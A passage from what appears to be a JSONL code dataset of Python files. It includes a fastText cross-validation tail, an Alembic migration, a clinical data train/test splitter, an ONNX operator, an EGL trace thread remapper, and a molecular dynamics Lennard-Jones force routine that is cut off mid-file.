splitFile.processOpts(list(argv))\n data = splitFile.readData(inFileName)\n 
splitFile.writeData(inFileName,data,n)\n accuracyTotal = 0.0\n for i in range(0,n):\n accuracy = fasttextRun(inFileName,i,n)\n accuracyTotal += accuracy\n print(\"Fold: {0:0d}; Accuracy: {1:0.3f}\".format(i,accuracy))\n print(\"Average accuracy {0:0.3f}\".format(accuracyTotal/float(n)))\n return(0)\n\nif __name__ == \"__main__\":\n sys.exit(main(sys.argv))\n\n"} {"ext": "py", "sha": "1a30d5333d9aa11674a21e729d83eab98d8c4682", "content": "# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"\nRemove useless index\n\nRevision ID: 7750037b351a\nRevises: f449e5bff5a5\nCreate Date: 2016-12-17 21:10:27.781900\n\"\"\"\n\nfrom alembic import op\n\n\nrevision = \"7750037b351a\"\ndown_revision = \"f449e5bff5a5\"\n\n\ndef upgrade():\n op.drop_index(\"release_files_name_idx\", table_name=\"release_files\")\n\n\ndef downgrade():\n op.create_index(\"release_files_name_idx\", \"release_files\", [\"name\"], unique=False)\n"} {"ext": "py", "sha": "1a30d74ada71fef6bf218e5e7da43d24872e31fd", "content": "# coding: utf8\n\nfrom .tsv_utils import complementary_list, find_label, baseline_df, chi2\nfrom clinicaaddl.tools.deep_learning.iotools import return_logger\nfrom scipy.stats import ttest_ind\nimport shutil\nimport pandas as pd\nfrom os import path\nimport numpy as np\nimport os\nimport logging\n\nsex_dict = {'M': 0, 'F': 1}\n\n\ndef create_split(diagnosis, diagnosis_df, n_test,\n pval_threshold_ttest=0.80, t_val_chi2_threshold=0.0642,\n ignore_demographics=False, logger=None):\n \"\"\"\n Split data at the subject-level in training and test set with equivalent age and sex distributions\n\n :param diagnosis: (str) diagnosis on which the split is done\n :param diagnosis_df: DataFrame with columns including ['participant_id', 'session_id', 'diagnosis']\n :param n_test: (float)\n If >= 1 number of subjects to put in the test set.\n If < 1 proportion of subjects to put in the test set.\n :param pval_threshold_ttest: (float) threshold for the t-test on age\n :param t_val_chi2_threshold: (float) threshold for the chi2 test on sex\n :param ignore_demographics: (bool): If True the diagnoses are split without taking into account the demographics\n distributions (age, sex).\n :param logger: Logger object from logging library\n :return:\n train_df (DataFrame) subjects in the train set\n test_df (DataFrame) subjects in the test set\n \"\"\"\n\n if logger is None:\n logger = logging\n logger.basicConfig(level=logging.DEBUG)\n\n diagnosis_baseline_df = baseline_df(diagnosis_df)\n\n if n_test >= 1:\n n_test = int(n_test)\n else:\n n_test = int(n_test * len(diagnosis_baseline_df))\n\n if not ignore_demographics:\n try:\n sex_label = find_label(diagnosis_baseline_df.columns.values, \"sex\")\n age_label = find_label(diagnosis_baseline_df.columns.values, \"age\")\n except ValueError:\n raise ValueError(\"This dataset do not have age or sex values. 
\"\n \"Please add the flag --ignore_demographics to split \"\n \"without trying to balance age or sex distributions.\")\n\n sex = list(diagnosis_baseline_df[sex_label].values)\n age = list(diagnosis_baseline_df[age_label].values)\n\n idx = np.arange(len(diagnosis_baseline_df))\n\n flag_selection = True\n n_try = 0\n\n while flag_selection:\n idx_test = np.random.choice(idx, size=n_test, replace=False)\n idx_test.sort()\n idx_train = complementary_list(idx, idx_test)\n\n # Find similarity of distribution for the age variable\n if len(set(age)) != 1:\n age_test = [float(age[idx]) for idx in idx_test]\n age_train = [float(age[idx]) for idx in idx_train]\n\n t_age, p_age = ttest_ind(age_test, age_train)\n else:\n p_age = 1\n\n # Find the a similar distribution for the sex variable\n if len(set(sex)) != 1:\n sex_test = [sex_dict[sex[idx]] for idx in idx_test]\n sex_train = [sex_dict[sex[idx]] for idx in idx_train]\n T_sex = chi2(sex_test, sex_train)\n else:\n T_sex = 0\n\n logger.debug(\"p=%.2f, T=%.4f\" % (p_age, T_sex))\n if T_sex < t_val_chi2_threshold and p_age > pval_threshold_ttest:\n flag_selection = False\n test_df = diagnosis_baseline_df.loc[idx_test]\n train_df = diagnosis_baseline_df.loc[idx_train]\n\n n_try += 1\n\n logger.info(\"Split for diagnosis %s was found after %i trials\" % (diagnosis, n_try))\n else:\n idx = np.arange(len(diagnosis_baseline_df))\n idx_test = np.random.choice(idx, size=n_test, replace=False)\n idx_test.sort()\n idx_train = complementary_list(idx, idx_test)\n test_df = diagnosis_baseline_df.loc[idx_test]\n train_df = diagnosis_baseline_df.loc[idx_train]\n\n return train_df, test_df\n\n\ndef split_diagnoses(formatted_data_path,\n n_test=100, subset_name=\"test\", MCI_sub_categories=True,\n t_val_threshold=0.0642, p_val_threshold=0.80,\n ignore_demographics=False, verbose=0):\n \"\"\"\n Performs a single split for each label independently on the subject level.\n The train folder will contain two lists per diagnosis (baseline and longitudinal),\n whereas the test folder will only include the list of baseline sessions.\n\n The age and sex distributions between the two sets must be non-significant (according to T-test and chi-square).\n\n Args:\n formatted_data_path (str): Path to the folder containing data extracted by clinicaaddl tsvtool getlabels.\n n_test (float):\n If > 1, number of subjects to put in set with name 'subset_name'.\n If < 1, proportion of subjects to put in set with name 'subset_name'.\n If 0, no training set is created and the whole dataset is considered as one set with name 'subset_name'.\n subset_name (str): Name of the subset that is complementary to train.\n MCI_sub_categories (bool): If True, manages MCI sub-categories to avoid data leakage.\n t_val_threshold (float): The threshold used for the chi2 test on sex distributions.\n p_val_threshold (float): The threshold used for the T-test on age distributions.\n ignore_demographics (bool): If True the diagnoses are split without taking into account the demographics\n distributions (age, sex).\n verbose (int): level of verbosity.\n\n Returns:\n writes three files per <label>.tsv file present in formatted_data_path:\n - formatted_data_path/train/<label>.tsv\n - formatted_data_path/train/<label>_baseline.tsv\n - formatted_data_path/<subset_name>/<label>_baseline.tsv\n \"\"\"\n logger = return_logger(verbose, \"split\")\n\n # Read files\n results_path = formatted_data_path\n\n train_path = path.join(results_path, 'train')\n if path.exists(train_path):\n shutil.rmtree(train_path)\n if n_test > 
0:\n os.makedirs(train_path)\n\n test_path = path.join(results_path, subset_name)\n if path.exists(test_path):\n shutil.rmtree(test_path)\n os.makedirs(test_path)\n\n diagnosis_df_paths = os.listdir(results_path)\n diagnosis_df_paths = [x for x in diagnosis_df_paths if x.endswith('.tsv')]\n diagnosis_df_paths = [x for x in diagnosis_df_paths if not x.endswith('_baseline.tsv')]\n\n MCI_special_treatment = False\n\n if 'MCI.tsv' in diagnosis_df_paths and n_test > 0:\n if MCI_sub_categories:\n diagnosis_df_paths.remove('MCI.tsv')\n MCI_special_treatment = True\n elif 'sMCI.tsv' in diagnosis_df_paths or 'pMCI.tsv' in diagnosis_df_paths:\n logger.warning(\"MCI special treatment was deactivated though MCI subgroups were found.\"\n \"Be aware that it may cause data leakage in transfer learning tasks.\")\n\n # The baseline session must be kept before or we are taking all the sessions to mix them\n for diagnosis_df_path in diagnosis_df_paths:\n diagnosis_df = pd.read_csv(path.join(results_path, diagnosis_df_path),\n sep='\\t')\n interest_columns = diagnosis_df.columns.values\n diagnosis = diagnosis_df_path.split('.')[0]\n logger.info(\"Running split for diagnosis %s\" % diagnosis)\n if n_test > 0:\n train_df, test_df = create_split(diagnosis, diagnosis_df, n_test=n_test,\n t_val_chi2_threshold=t_val_threshold,\n pval_threshold_ttest=p_val_threshold,\n ignore_demographics=ignore_demographics,\n logger=logger)\n # Save baseline splits\n train_df = train_df[interest_columns]\n train_df.to_csv(path.join(train_path, str(diagnosis) + '_baseline.tsv'), sep='\\t', index=False)\n test_df = test_df[interest_columns]\n test_df.to_csv(path.join(test_path, str(diagnosis) + '_baseline.tsv'), sep='\\t', index=False)\n\n # Retrieve all sessions for the training set\n complete_train_df = pd.DataFrame()\n for idx in train_df.index.values:\n subject = train_df.loc[idx, 'participant_id']\n subject_df = diagnosis_df[diagnosis_df.participant_id == subject]\n complete_train_df = pd.concat([complete_train_df, subject_df])\n\n complete_train_df.to_csv(path.join(train_path, str(diagnosis) + '.tsv'), sep='\\t', index=False)\n\n else:\n diagnosis_baseline_df = baseline_df(diagnosis_df)\n test_df = diagnosis_baseline_df[interest_columns]\n test_df.to_csv(path.join(test_path, str(diagnosis) + '_baseline.tsv'), sep='\\t', index=False)\n\n if MCI_special_treatment:\n\n # Extraction of MCI subjects without intersection with the sMCI / pMCI train\n diagnosis_df = pd.read_csv(path.join(results_path, 'MCI.tsv'), sep='\\t')\n MCI_df = diagnosis_df.set_index(['participant_id', 'session_id'])\n baseline_MCI_df = baseline_df(MCI_df, set_index=False)\n supplementary_diagnoses = []\n\n if n_test > 1:\n n_test = int(n_test)\n else:\n n_test = int(n_test * len(baseline_MCI_df))\n\n logger.debug('Before subjects removal for MCI special treatment')\n if n_test > 1:\n n_test = int(n_test)\n else:\n n_test = int(n_test * len(baseline_MCI_df))\n\n sub_df = diagnosis_df.reset_index().groupby('participant_id')['session_id'].nunique()\n logger.debug('%i subjects, %i scans' % (len(sub_df), len(diagnosis_df)))\n\n if 'sMCI.tsv' in diagnosis_df_paths:\n sMCI_baseline_train_df = pd.read_csv(path.join(train_path, 'sMCI_baseline.tsv'), sep='\\t')\n sMCI_baseline_test_df = pd.read_csv(path.join(test_path, 'sMCI_baseline.tsv'), sep='\\t')\n sMCI_baseline_df = pd.concat([sMCI_baseline_train_df, sMCI_baseline_test_df])\n sMCI_baseline_df.reset_index(drop=True, inplace=True)\n for idx in sMCI_baseline_df.index.values:\n subject = sMCI_baseline_df.loc[idx, 
'participant_id']\n MCI_df.drop(subject, inplace=True)\n supplementary_diagnoses.append('sMCI')\n\n logger.debug('Removed %i subjects based on sMCI label' % len(sMCI_baseline_df))\n sub_df = MCI_df.reset_index().groupby('participant_id')['session_id'].nunique()\n logger.debug('%i subjects, %i scans' % (len(sub_df), len(MCI_df)))\n\n if 'pMCI.tsv' in diagnosis_df_paths:\n pMCI_baseline_train_df = pd.read_csv(path.join(train_path, 'pMCI_baseline.tsv'), sep='\\t')\n pMCI_baseline_test_df = pd.read_csv(path.join(test_path, 'pMCI_baseline.tsv'), sep='\\t')\n pMCI_baseline_df = pd.concat([pMCI_baseline_train_df, pMCI_baseline_test_df])\n pMCI_baseline_df.reset_index(drop=True, inplace=True)\n for idx in pMCI_baseline_df.index.values:\n subject = pMCI_baseline_df.loc[idx, 'participant_id']\n MCI_df.drop(subject, inplace=True)\n supplementary_diagnoses.append('pMCI')\n\n logger.debug('Removed %i subjects based on pMCI label' % len(pMCI_baseline_df))\n sub_df = MCI_df.reset_index().groupby('participant_id')['session_id'].nunique()\n logger.debug('%i subjects, %i scans' % (len(sub_df), len(MCI_df)))\n\n if len(supplementary_diagnoses) == 0:\n raise ValueError('The MCI_sub_categories flag is not needed as there are no intersections with'\n 'MCI subcategories.')\n\n # Construction of supplementary train\n supplementary_train_df = pd.DataFrame()\n for diagnosis in supplementary_diagnoses:\n sup_baseline_train_df = pd.read_csv(path.join(train_path, diagnosis + '_baseline.tsv'), sep='\\t')\n supplementary_train_df = pd.concat([supplementary_train_df, sup_baseline_train_df])\n sub_df = supplementary_train_df.reset_index().groupby('participant_id')['session_id'].nunique()\n logger.debug('supplementary_train_df %i subjects, %i scans' % (len(sub_df), len(supplementary_train_df)))\n\n supplementary_train_df.reset_index(drop=True, inplace=True)\n\n # MCI selection\n MCI_df.reset_index(inplace=True)\n diagnosis_baseline_df = baseline_df(MCI_df)\n if not ignore_demographics:\n sex_label = find_label(diagnosis_baseline_df.columns.values, \"sex\")\n age_label = find_label(diagnosis_baseline_df.columns.values, \"age\")\n\n sex = list(diagnosis_baseline_df[sex_label].values)\n age = list(diagnosis_baseline_df[age_label].values)\n\n sup_train_sex = list(supplementary_train_df[sex_label].values)\n sup_train_age = list(supplementary_train_df[age_label].values)\n\n sup_train_sex = [sex_dict[x] for x in sup_train_sex]\n sup_train_age = [float(x) for x in sup_train_age]\n\n idx = np.arange(len(diagnosis_baseline_df))\n\n flag_selection = True\n n_try = 0\n\n while flag_selection:\n idx_test = np.random.choice(idx, size=n_test, replace=False)\n idx_test.sort()\n idx_train = complementary_list(idx, idx_test)\n\n # Find similarity of distribution for the age variable\n if len(set(age)) != 1:\n age_test = [float(age[idx]) for idx in idx_test]\n age_train = [float(age[idx]) for idx in idx_train]\n\n t_age, p_age = ttest_ind(age_test, age_train)\n else:\n p_age = 1\n\n # Find similarity of distribution for the sex variable\n if len(set(sex)) != 1:\n sex_test = [sex_dict[sex[idx]] for idx in idx_test]\n sex_train = [sex_dict[sex[idx]] for idx in idx_train]\n T_sex = chi2(sex_test, sex_train)\n else:\n T_sex = 0\n\n logger.debug(\"p=%.2f, T=%.4f\" % (p_age, T_sex))\n if T_sex < t_val_threshold and p_age > p_val_threshold:\n flag_selection = False\n MCI_baseline_test_df = diagnosis_baseline_df.loc[idx_test]\n train_df = diagnosis_baseline_df.loc[idx_train]\n MCI_baseline_train_df = pd.concat([train_df, supplementary_train_df])\n 
logger.debug('Supplementary train df %i' % len(supplementary_train_df))\n MCI_baseline_train_df.reset_index(drop=True, inplace=True)\n\n n_try += 1\n\n logger.info('Split for diagnosis MCI was found after %i trials' % n_try)\n else:\n idx = np.arange(len(diagnosis_baseline_df))\n idx_test = np.random.choice(idx, size=n_test, replace=False)\n idx_test.sort()\n idx_train = complementary_list(idx, idx_test)\n\n MCI_baseline_test_df = diagnosis_baseline_df.loc[idx_test]\n train_df = diagnosis_baseline_df.loc[idx_train]\n MCI_baseline_train_df = pd.concat([train_df, supplementary_train_df])\n MCI_baseline_train_df.reset_index(drop=True, inplace=True)\n\n # Write selection of MCI\n MCI_baseline_train_df = MCI_baseline_train_df[interest_columns]\n MCI_baseline_train_df.to_csv(path.join(train_path, 'MCI_baseline.tsv'), sep='\\t', index=False)\n MCI_baseline_test_df = MCI_baseline_test_df[interest_columns]\n MCI_baseline_test_df.to_csv(path.join(test_path, 'MCI_baseline.tsv'), sep='\\t', index=False)\n\n # Retrieve all sessions for the training set\n MCI_complete_train_df = pd.DataFrame()\n for idx in MCI_baseline_train_df.index.values:\n subject = MCI_baseline_train_df.loc[idx, 'participant_id']\n subject_df = diagnosis_df[diagnosis_df.participant_id == subject]\n MCI_complete_train_df = pd.concat([MCI_complete_train_df, subject_df])\n\n MCI_complete_train_df.to_csv(path.join(train_path, 'MCI.tsv'), sep='\\t', index=False)\n"} {"ext": "py", "sha": "1a30d8d4aef7461996b7aa5e1b8ebbc7e1a661b6", "content": "# -*- encoding: utf-8 -*-\n# pylint: disable=E0203,E1101,C0111\n\"\"\"\n@file\n@brief Runtime operator.\n\"\"\"\nimport numpy\nfrom ._op import OpRun\n\n\nclass ConstantOfShape(OpRun):\n\n atts = {'value': numpy.array([0], dtype=numpy.float32)}\n\n def __init__(self, onnx_node, desc=None, **options):\n OpRun.__init__(self, onnx_node, desc=desc,\n expected_attributes=ConstantOfShape.atts,\n **options)\n self.cst = (self.value[0]\n if isinstance(self.value, numpy.ndarray)\n else self.value)\n if not isinstance(self.cst, (float, numpy.float32, numpy.float64)):\n raise TypeError(\"cst must be a real not {}\".format(type(self.cst)))\n\n def _run(self, data): # pylint: disable=W0221\n res = numpy.full(tuple(data), self.cst)\n return (res, )\n"} {"ext": "py", "sha": "1a30db0846b18c8770feddae9c5305158d14ef18", "content": "#!/usr/bin/env python3\nimport argparse\nimport json\nimport os\nfrom patrace import (\n InputFile,\n OutputFile,\n Call,\n CreateInt32Value,\n)\n\n\nclass Arg:\n def __init__(self, type, name, value):\n self.type = type\n self.name = name\n self.value = value\n\n def get(self):\n arg = self.type(self.value)\n if self.name:\n arg.mName = self.name\n return arg\n\n\nclass Function:\n def __init__(self, name, args):\n self.name = name\n self.args = args\n\n def write(self, output, tid):\n call = Call(self.name)\n call.thread_id = tid\n\n for arg in self.args[1:]:\n call.args.push_back(arg.get())\n\n call.return_value = self.args[0].get()\n\n output.WriteCall(call)\n\n\nclass Remapper:\n def __init__(self):\n self.num_calls_remapped = 0\n\n def run(self, input, output):\n # Modify header, if we are remaping the default tid\n header = json.loads(input.jsonHeader)\n default_tid = header['defaultTid']\n output.jsonHeader = json.dumps(header)\n\n print('Searching for relevant calls...')\n call_lists = {\n 'eglMakeCurrent': [],\n 'eglCreateContext': [],\n 'eglDestroyContext': [],\n }\n\n context_calls = []\n highest_thread_id = -1\n for call in input.Calls():\n highest_thread_id = 
max(call.thread_id, highest_thread_id)\n # call_list = call_lists.get(call.name, None)\n if call.name in list(call_lists.keys()):\n context_calls.append({\n 'name': call.name,\n 'tid': call.thread_id,\n 'params': call.GetArgumentsDict().copy(),\n 'retval': call.GetReturnValue(),\n 'number': call.number,\n })\n # if call_list is not None:\n # call_list.append({\n # 'call_name': call.name,\n # 'tid': call.thread_id,\n # 'params': call.GetArgumentsDict(),\n # 'retval': call.GetReturnValue(),\n # 'number': call.number,\n # })\n num_threads = highest_thread_id + 1\n\n print(\"Renumbering context ids...\")\n # Sometimes, contexts can get the same pointer values\n # Hence, the contexts pointers will not be unique. Therefor,\n # we create an unique, sequential id.\n context_sequential_id = 1\n # Maps original context id with sequential context id.\n contexts_idmap = {0: 0}\n for call in context_calls:\n if call['name'] == 'eglCreateContext':\n contexts_idmap[call['retval']] = context_sequential_id\n call['retval'] = context_sequential_id\n context_sequential_id += 1\n elif call['name'] == 'eglDestroyContext':\n old_id = call['params']['ctx']\n seq_id = contexts_idmap[old_id]\n del contexts_idmap[old_id]\n call['params']['ctx'] = seq_id\n elif call['name'] == 'eglMakeCurrent':\n # Change ctx parameter to our new sequential id\n call['params']['ctx'] = contexts_idmap[call['params']['ctx']]\n\n print(\"Finding relevant context and surfaces...\")\n make_current_args = [\n (call['params']['draw'], call['params']['ctx'])\n for call in context_calls\n if (\n call['name'] == 'eglMakeCurrent'\n # Excluding the following test made things work for GunJack\n # call['tid'] in [default_tid, 0]\n )\n ]\n\n import pprint\n pprint.pprint(make_current_args)\n\n surfaces = []\n contexts = []\n\n for draw, ctx in make_current_args:\n if draw:\n surfaces.append(draw)\n\n if ctx:\n contexts.append(ctx)\n\n # Find all relevant shared contexts\n shared_contexts = []\n\n for context in contexts:\n for context_call in context_calls:\n if context_call['name'] != 'eglCreateContext':\n continue\n\n if context_call['retval'] == context:\n shared_contexts.append(context_call['params']['share_context'])\n\n for share_context in shared_contexts:\n contexts.append(share_context)\n\n contexts = set(contexts)\n surfaces = set(surfaces)\n print(\"Surfaces {}\".format(surfaces))\n print(\"Contexts: {}\".format(contexts))\n\n class Thread:\n def __init__(self):\n self.current_ctx_seq = 0\n self.current_ctx_old = 0\n self.remap = 0\n\n threads = [Thread() for i in range(num_threads)]\n # Used to indicate if inside a relevant \"eglMakeCurrent-block\"\n\n print(\"Remap calls...\")\n\n contextid_to_use = None\n\n contexts_idmap = {0: 0}\n context_sequential_id = 1\n active_thread = -1\n for call in input.Calls():\n current_thread = call.thread_id\n thread_switch = False\n if active_thread != current_thread:\n thread_switch = True\n active_thread = current_thread\n\n if call.name == 'eglCreateContext':\n oldid = call.GetReturnValue()\n contexts_idmap[oldid] = context_sequential_id\n if context_sequential_id in contexts:\n contextid_to_use = oldid\n print(\"We will map all calls of the context:\", contextid_to_use)\n self.remap(call, default_tid)\n context_sequential_id += 1\n elif call.name == 'eglDestroyContext':\n ad = call.GetArgumentsDict()\n oldid = ad['ctx']\n # seqid = contexts_idmap[oldid]\n del contexts_idmap[oldid]\n elif (\n call.name.startswith('eglCreateWindowSurface') or\n call.name == 'eglCreatePbufferSurface'\n ):\n if 
call.GetReturnValue() in surfaces:\n self.remap(call, default_tid)\n elif call.name == 'eglDestroySurface':\n ad = call.GetArgumentsDict()\n if ad['surface'] in surfaces:\n self.remap(call, default_tid)\n elif call.name == 'eglMakeCurrent':\n t = threads[call.thread_id]\n ad = call.GetArgumentsDict()\n t.current_dpy = ad['dpy']\n t.current_draw = ad['draw']\n t.current_read = ad['read']\n t.current_ctx_old = ad['ctx']\n t.current_ctx_seq = contexts_idmap[ad['ctx']]\n\n if t.current_ctx_seq in contexts:\n # call.SetArgument(3, contextid_to_use)\n t.remap = True\n\n if ad['ctx'] == 0:\n t.remap = False\n\n if threads[call.thread_id].remap:\n # If a context is already active on the default thread\n # We need to inject an eglMakeCurrent the first time\n if thread_switch and call.name != 'eglMakeCurrent':\n t = threads[call.thread_id]\n Function(\n 'eglMakeCurrent', [\n Arg(CreateInt32Value, '', 1),\n Arg(CreateInt32Value, 'dpy', t.current_dpy),\n Arg(CreateInt32Value, 'draw', t.current_draw),\n Arg(CreateInt32Value, 'read', t.current_read),\n Arg(CreateInt32Value, 'ctx', t.current_ctx_old),\n ]\n ).write(output, default_tid)\n\n self.remap(call, default_tid)\n\n output.WriteCall(call)\n\n def remap(self, call, newtid):\n call.thread_id = newtid\n self.num_calls_remapped += 1\n\n\ndef remap(oldfile, newfile):\n remapper = Remapper()\n\n if not os.path.exists(oldfile):\n print(\"File does not exists: {}\".format(oldfile))\n return\n\n with InputFile(oldfile) as input:\n with OutputFile(newfile) as output:\n remapper.run(input, output)\n\n return remapper.num_calls_remapped\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Automatically remap thread ids in a .pat trace. This should be used if an eglContext is used by more threads than the default thread.')\n parser.add_argument('oldfile', help='Path to the .pat trace file')\n parser.add_argument('newfile', help='New .pat file to create')\n\n args = parser.parse_args()\n num = remap(args.oldfile, args.newfile)\n\n print(\"Number of calls remapped {num}\".format(num=num))\n\n\nif __name__ == '__main__':\n main()\n"} {"ext": "py", "sha": "1a30de5d5fd395c60bbbcfe468f5f8bb2ea0c880", "content": "#!/usr/bin/env python3\n# md_lj_ll_module.py\n\n#------------------------------------------------------------------------------------------------#\n# This software was written in 2016/17 #\n# by Michael P. Allen <m.p.allen@warwick.ac.uk>/<m.p.allen@bristol.ac.uk> #\n# and Dominic J. Tildesley <d.tildesley7@gmail.com> (\"the authors\"), #\n# to accompany the book \"Computer Simulation of Liquids\", second edition, 2017 (\"the text\"), #\n# published by Oxford University Press (\"the publishers\"). #\n# #\n# LICENCE #\n# Creative Commons CC0 Public Domain Dedication. #\n# To the extent possible under law, the authors have dedicated all copyright and related #\n# and neighboring rights to this software to the PUBLIC domain worldwide. #\n# This software is distributed without any warranty. #\n# You should have received a copy of the CC0 Public Domain Dedication along with this software. #\n# If not, see <http://creativecommons.org/publicdomain/zero/1.0/>. #\n# #\n# DISCLAIMER #\n# The authors and publishers make no warranties about the software, and disclaim liability #\n# for all uses of the software, to the fullest extent permitted by applicable law. #\n# The authors and publishers do not recommend use of this software for any purpose. #\n# It is made freely available, solely to clarify points made in the text. 
When using or citing #\n# the software, you should not imply endorsement by the authors or publishers. #\n#------------------------------------------------------------------------------------------------#\n\n\"\"\"Force routine for MD simulation, LJ atoms, using neighbour lists.\"\"\"\n\nfast = True # Change this to replace NumPy force evaluation with slower Python\n\nclass PotentialType:\n \"\"\"A composite variable for interactions.\"\"\"\n\n def __init__(self, cut, pot, vir, lap, ovr):\n self.cut = cut # the potential energy cut (but not shifted) at r_cut\n self.pot = pot # the potential energy cut-and-shifted at r_cut\n self.vir = vir # the virial\n self.lap = lap # the Laplacian\n self.ovr = ovr # a flag indicating overlap (i.e. pot too high to use)\n\n def __add__(self, other):\n cut = self.cut + other.cut\n pot = self.pot + other.pot\n vir = self.vir + other.vir\n lap = self.lap + other.lap\n ovr = self.ovr or other.ovr\n\n return PotentialType(cut,pot,vir,lap,ovr)\n\ndef introduction():\n \"\"\"Prints out introductory statements at start of run.\"\"\"\n \n print('Lennard-Jones potential')\n print('Cut-and-shifted version for dynamics')\n print('Cut (but not shifted) version also calculated')\n print('Diameter, sigma = 1')\n print('Well depth, epsilon = 1')\n if fast:\n print('Fast NumPy force routine')\n else:\n print('Slow Python force routine')\n print('Uses neighbour lists')\n\ndef conclusion():\n \"\"\"Prints out concluding statements at end of run.\"\"\"\n\n print('Program ends')\n\ndef force ( box, r_cut, r ):\n \"\"\"Takes in box, cutoff range, and coordinate array, and calculates forces and potentials etc.\"\"\"\n\n import numpy as np\n from itertools import product\n import math\n \n # It is assumed that positions are in units where box = 1\n # Forces are calculated in units where sigma = 1 and epsilon = 1\n # Uses neighbour lists\n\n n = r.shape[0]\n\n # Set up vectors to half the cells in neighbourhood of 3x3x3 cells in cubic lattice\n # The cells are chosen so that if (d0,d1,d2) appears, then (-d0,-d1,-d2) does not.\n d = np.array ( [ [ 0, 0, 0], [ 1, 0, 0], [ 1, 1, 0], [-1, 1, 0],\n [ 0, 1, 0], [ 0, 0, 1], [-1, 0, 1], [ 1, 0, 1], [-1,-1, 1],\n [ 0,-1, 1], [ 1,-1, 1], [-1, 1, 1], [ 0, 1, 1], [ 1, 1, 1] ] )\n\n r = r - np.rint(r) # Ensure all atoms in periodic box\n \n sr2_ovr = 1.77 # Overlap threshold (pot > 100)\n r_cut_box = r_cut / box\n r_cut_box_sq = r_cut_box ** 2\n box_sq = box ** 2\n\n # Calculate potential at cutoff\n sr2 = 1.0 / r_cut**2 # in sigma=1 units\n sr6 = sr2 ** 3\n sr12 = sr6 **2\n pot_cut = sr12 - sr6 # Without numerical factor 4\n\n # Initialize\n f = np.zeros_like(r)\n total = PotentialType ( cut=0.0, pot=0.0, vir=0.0, lap=0.0, ovr=False )\n\n # Calculate cell index triplets\n sc = math.floor(box/r_cut) # Number of cells along box edge\n c = np.floor((r+0.5)*sc).astype(np.int_) # N*3 array of cell indices for all atoms\n assert np.all(c>=0) and np.all(c<sc), 'Index error' # Simplistic \"guard\" against roundoff\n\n if fast:\n \n # Build list of arrays, each array holding positions of atoms in a cell\n # At the same time, define a matching set of force arrays in each cell\n # i and j number the atoms in each cell; we do not refer explicitly to indices in r\n rc, fc = [], [] # Initially empty lists of positions and forces\n for ci in product(range(sc),repeat=3): # Triple loop over cells\n mask = np.all(c==ci,axis=1) # Mask identifies atoms in this cell\n rc.append(r[mask,:]) # Copy atom coordinates into array, add to list\n 
fc.append(np.zeros_like(rc[-1])) # Zero corresponding forces, add to list\n\n for ci1, rci in enumerate(rc): # Loop over i-cells, getting all atoms in each i-cell as an array\n ci = np.unravel_index(ci1,(sc,sc,sc)) # Get i-cell triple-indices\n if rci.size==0: # Handle empty cell\n continue\n\n for dj in d: # Loop over neighbouring j-cells\n cj = ci + dj # Compute neighbour j-cell triple-indices\n cj1 = np.ravel_multi_index(cj,(sc,sc,sc),mode='wrap') # Convert j-cell to single-index\n rcj = rc[cj1] # Get atoms in j-cell as an array\n if rcj.size==0: # Handle empty cell\n continue\n\n rij = rci[:,np.newaxis,:]-rcj[np.newaxis,:,:] # Separation vectors for all i and j\n rij = rij - np.rint(rij) # PBCs in box=1 units\n rij_sq = np.sum(rij**2,axis=2) # Squared separations\n in_range = rij_sq < r_cut_box_sq # Set flags for within cutoff\n\n if ci1==cj1:\n np.fill_diagonal(in_range,False) # Eliminate i==j when i-cell==j-cell\n np.fill_diagonal(rij_sq,1.0) # Avoid divide-by-zero below\n\n rij_sq = rij_sq * box_sq # Now in sigma=1 units\n rij = rij * box # Now in sigma=1 units\n sr2 = np.where ( in_range, 1.0/rij_sq, 0.0 ) # (sigma/rij)**2, only if in range\n ovr = sr2 > sr2_ovr # Overlap if too close\n sr6 = sr2 ** 3\n sr12 = sr6 ** 2\n cut = sr12 - sr6 # LJ potential (cut but not shifted)\n vir = cut + sr12 # LJ virial\n pot = np.where ( in_range, cut-pot_cut, 0.0 ) # LJ potential (cut-and-shifted)\n lap = ( 22.0*sr12 - 5.0*sr6 ) * sr2 # LJ Laplacian\n fij = vir * sr2 # LJ scalar part of forces\n fij = rij * fij[:,:,np.newaxis] # LJ pair forces\n\n if ci1==cj1: # Correct for double-counting ij and ji when i-cell==j-cell\n fij = fij / 2\n total = total + PotentialType ( cut=np.sum(cut)/2, pot=np.sum(pot)/2,\n vir=np.sum(vir)/2, lap=np.sum(lap)/2, ovr=np.any(ovr) )\n else:\n total = total + PotentialType ( cut=np.sum(cut), pot=np.sum(pot),\n vir=np.sum(vir), lap=np.sum(lap), ovr=np.any(ovr) )\n\n fc[ci1][:,:] = fc[ci1][:,:] + np.sum(fij,axis=1) # Aggregate force on atoms in i-cell\n fc[cj1][:,:] = fc[cj1][:,:] - np.sum(fij,axis=0) # Aggregate force on atoms in j-cell\n\n # Copy forces from list of cell arrays to main force array\n for ci in product(range(sc),repeat=3): # Triple loop over cells\n mask = np.all(c==ci,axis=1) # Mask identifies atoms in this cell\n ci1 = np.ravel_multi_index(ci,(sc,sc,sc),mode='wrap') # Single-index\n f[mask,:] = fc[ci1] # Copy atom forces from correct cell\n\n else:\n \n # Build list of arrays, each array holding indices of atoms in a cell\n # ki and kj are atom indices in the r array; i and j number the atoms in each cell\n k_array = np.arange(n) # Atom indices 0..N-1\n kc = [] # Initially empty list of indices\n for ci in product(range(sc),repeat=3): # Triple loop over cells\n mask = np.all(c==ci,axis=1) # Mask identifies atoms in this cell\n kc.append(k_array[mask]) # Copy atom indices into array, add to list\n\n for ci1, kci in enumerate(kc): # Loop over i-cells, getting atom indices as an array\n ci = np.unravel_index(ci1,(sc,sc,sc)) # Get i-cell triple-indices\n\n for dj in d: # Loop over neighbouring j-cells\n cj = ci + dj # Compute neighbour j-cell triple-indices\n cj1 = np.ravel_multi_index(cj,(sc,sc,sc),mode='wrap') # Convert to single-index\n kcj = kc[cj1] # Get indices of atoms in j-cell as an array\n\n for i, ki in enumerate(kci): # Loop over individual atoms in i-cell\n j0 = i+1 if cj1==ci1 else 0 # Only look upwards if i-cell==j-cell\n if j0 >= kcj.size: # Handles (redundantly) empty j-cell and the case \n continue # where 